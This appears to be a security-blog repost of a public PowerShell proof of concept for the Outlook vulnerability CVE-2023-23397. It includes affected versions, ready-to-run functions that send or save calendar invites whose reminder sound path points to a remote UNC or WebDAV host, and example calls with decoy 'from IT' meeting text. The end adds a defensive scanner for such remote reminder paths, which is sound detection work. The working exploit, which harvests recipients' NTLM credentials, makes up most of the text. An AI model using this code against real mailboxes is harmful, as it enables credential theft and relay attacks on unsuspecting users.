[CVE-2023-23397] Microsoft Outlook Security Vulnerability

Author: Sec-Labs | Published:

Project URL

https://github.com/api0cradle/CVE-2023-23397-POC-Powershell

Vulnerability Overview

Microsoft Outlook is an email application from Microsoft, a US company.

Microsoft Outlook contains a security vulnerability. The following products and versions are affected: Microsoft Office LTSC 2021 for 32-bit editions, Microsoft Outlook 2016 (32-bit edition), Microsoft Office LTSC 2021 for 64-bit editions, Microsoft 365 Apps for Enterprise for 64-bit Systems, Microsoft Office 2019 for 64-bit editions, Microsoft 365 Apps for Enterprise for 32-bit Systems, Microsoft Office 2019 for 32-bit editions, Microsoft Outlook 2013 Service Pack 1 (64-bit editions), Microsoft Outlook 2013 RT Service Pack 1, Microsoft Outlook 2013 Service Pack 1 (32-bit editions), Microsoft Outlook 2016 (64-bit edition).

About the POC

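This code sends or saves a calendar item that leaks NTLM credentials through the ReminderSoundFile option. Run the script to load the functions in PowerShell, then use the examples below as a starting point for calling them. It must be run on a Windows machine with Outlook installed, because it uses the Outlook COM object to send the email. Note that the email is sent from the account associated with Outlook. The current functions set the meeting start time to the moment the script executes, with a duration of 2 hours.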

Sending

Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\10.10.10.10\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com@80\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com@SSL@443\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"

Saving

Save-CalendarNTLMLeak -remotefilepath "\\10.10.10.10\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@80\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@SSL@443\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"

 

Happy hacking :)

 

POC

CVE-2023-23397.ps1

# CVE-2023-23397 POC
# Author: Oddvar Moe (@oddvarmoe) - TrustedSec
# Usage examples: 
# 
# Sending:
# Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\10.10.10.10\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
# Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
# Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com@80\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
# Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com@SSL@443\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
#
# Saving:
# Save-CalendarNTLMLeak -remotefilepath "\\10.10.10.10\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
# Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
# Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@80\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
# Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@SSL@443\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"


function Send-CalendarNTLMLeak ($recipient, $remotefilepath, $meetingsubject, $meetingbody)
{
    $Outlook = New-Object -comObject Outlook.Application
    $newcal = $outlook.CreateItem('olAppointmentItem')
    $newcal.ReminderSoundFile = $remotefilepath
    $newcal.Recipients.add($recipient)
    $newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
    $newcal.Subject = $meetingsubject
    $newcal.Location = "Virtual"
    $newcal.Body = $meetingbody
    $newcal.Start = get-date
    $newcal.End = (get-date).AddHours(2)
    $newcal.ReminderOverrideDefault = 1
    $newcal.ReminderSet = 1
    $newcal.ReminderPlaysound = 1
    $newcal.send()
}

function Save-CalendarNTLMLeak ($remotefilepath, $meetingsubject, $meetingbody)
{
    $Outlook = New-Object -comObject Outlook.Application
    $newcal = $outlook.CreateItem('olAppointmentItem')
    $newcal.ReminderSoundFile = $remotefilepath
    $newcal.MeetingStatus = [Microsoft.Office.Interop.Outlook.OlMeetingStatus]::olMeeting
    $newcal.Subject = $meetingsubject
    $newcal.Location = "Virtual"
    $newcal.Body = $meetingbody
    $newcal.Start = get-date
    $newcal.End = (get-date).AddHours(2)
    $newcal.ReminderOverrideDefault = 1
    $newcal.ReminderSet = 1
    $newcal.ReminderPlaysound = 1
    $newcal.save()
}
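
As an added defensive example (not part of the original PoC or the TrustedSec project): the functions below flag items whose ReminderSoundFile is a UNC path, covering the SMB and WebDAV (`@80`, `@SSL@443`) forms shown in the usage examples, and scan the local Outlook profile's default Calendar and Tasks folders. The names Get-ReminderSoundRisk and Find-RemoteReminderSound and the $TrustedHosts allowlist are hypothetical.

```powershell
# Added defensive example, not part of the PoC above.
# Assumption: hosts allowed to serve reminder sounds (constructed placeholder).
$TrustedHosts = @('fileserver.corp.example')

function Get-ReminderSoundRisk {
    param([string]$Path, [string[]]$Trusted = $TrustedHosts)
    $r = [ordered]@{ Path = $Path; Remote = $false; Host = $null; Transport = $null; Suspicious = $false }
    # Only UNC paths (\\host\...) make Windows authenticate to another machine.
    if ($Path -and $Path.StartsWith('\\')) {
        # The authority is everything between the leading \\ and the next separator.
        $authority = ($Path.Substring(2) -split '[\\/]', 2)[0]
        $parts = $authority -split '@'
        # \\?\ and \\.\ are local device prefixes, not servers.
        if ($parts[0] -and $parts[0] -notin '?', '.') {
            $r.Remote     = $true
            $r.Host       = $parts[0].ToLowerInvariant()
            # host@80 or host@SSL@443 selects WebDAV over HTTP(S) instead of SMB.
            $r.Transport  = if ($parts.Count -gt 1) { 'WebDAV' } else { 'SMB' }
            $r.Suspicious = $Trusted -notcontains $r.Host
        }
    }
    [pscustomobject]$r
}

function Find-RemoteReminderSound {
    # Requires Outlook on this machine; reads only the signed-in profile.
    $ns = (New-Object -ComObject Outlook.Application).GetNamespace('MAPI')
    foreach ($folderId in 9, 13) {   # 9 = olFolderCalendar, 13 = olFolderTasks
        foreach ($item in $ns.GetDefaultFolder($folderId).Items) {
            $risk = Get-ReminderSoundRisk -Path $item.ReminderSoundFile
            if ($risk.Remote) {
                $risk | Add-Member -NotePropertyName Subject -NotePropertyValue $item.Subject -PassThru
            }
        }
    }
}

# Constructed samples: the four path forms from the usage examples, a trusted host, a local file.
$samples = @(
    '\\10.10.10.10\notexists\file.wav',
    '\\files.domain.com\notexists\file.wav',
    '\\files.domain.com@80\notexists\file.wav',
    '\\files.domain.com@SSL@443\notexists\file.wav',
    '\\fileserver.corp.example\sounds\chime.wav',
    'C:\Windows\Media\reminder.wav'
)
$samples | ForEach-Object { Get-ReminderSoundRisk -Path $_ } | Format-Table -AutoSize
```

Find-RemoteReminderSound only sees items already synced into the local profile, and a Suspicious value of True means the host is outside the allowlist, not that credentials were actually sent.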

 
